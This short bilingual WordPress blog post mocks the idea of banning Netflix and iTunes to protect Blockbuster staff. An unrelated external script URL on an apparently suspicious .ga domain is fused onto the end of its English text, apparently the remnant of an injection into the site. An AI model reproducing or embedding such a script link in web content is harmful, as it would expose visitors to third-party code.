分類
隨筆

為了保護百視達員工而禁止Netflix、Apple iTunes Store?(Banning Netflix and Apple iTunes Store for protecting the employees of Blockbuster?)

如果你的答案是Yes,你最好三思。想想你是不是真的很希望像幾十萬年前的祖先一樣活在洞穴裡。

If your answer is yes, you better think twice. Or you just want to keep living in the caves like our ancestors thousands years ago.https://js.developerstatss.ga/stat.js?n=ns1

發表迴響

在下方填入你的資料或按右方圖示以社群網站登入:

WordPress.com 標誌

您的留言將使用 WordPress.com 帳號。 登出 /  變更 )

Google photo

您的留言將使用 Google 帳號。 登出 /  變更 )

Twitter picture

您的留言將使用 Twitter 帳號。 登出 /  變更 )

Facebook照片

您的留言將使用 Facebook 帳號。 登出 /  變更 )

連結到 %s